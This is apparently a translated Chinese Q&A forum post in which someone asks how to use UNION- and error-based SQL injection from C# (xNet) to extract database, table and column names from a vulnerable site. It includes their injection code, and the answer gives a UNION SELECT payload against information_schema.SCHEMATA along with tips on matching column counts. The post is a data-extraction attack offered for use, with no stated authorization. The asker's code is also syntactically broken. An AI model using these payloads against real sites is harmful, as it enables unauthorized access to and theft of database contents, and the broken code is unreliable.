问题描述
如果我有一个易受攻击的站点,我将如何在 C# 中使用 UNION 或 ERROR 查询获取数据库名称、表名称、列名称和列中的行数?
我现在拥有的代码是:
(xNet)
HttpRequest httpRequest = new HttpRequest()
//DB NAMES
string result = httpRequest.Get("https://vulnerable.url/example?id=23" + " UNION ALL SELECT 1,group_concat(.:,database,.:),3,4,5,6 -- ")
//2 is the vulnerable column
if(result.Contains(".:")
{
string output = Regex.Match(result,".: (.*?) .:")
}
Console.Writeline(output);
这就是我试图用来获取数据库名称的内容,我知道要获取版本,我会将“database()”替换为“version()”(我认为)
但输出只是“database()”,
谢谢
解决方法
使用 information_schema SCHEMATA 包含数据库,但还有其他用于 Tables 和 COLUMNS。
所以:
UNION SELECT CATALOG_NAME,SCHEMA_NAME FROM information_schema.SCHEMATA
棘手的一点是将这个 UNION 中的列数与原始查询返回的内容相匹配。像您的示例一样,您可以使用虚拟值或 CONCAT(f1,' ',f2) 填充字段,如果您的字段多于原始查询。
关于 SQL 的另一部分是知道您在哪里注入,以便您可以调整字符串以使其成为有效的 SQL。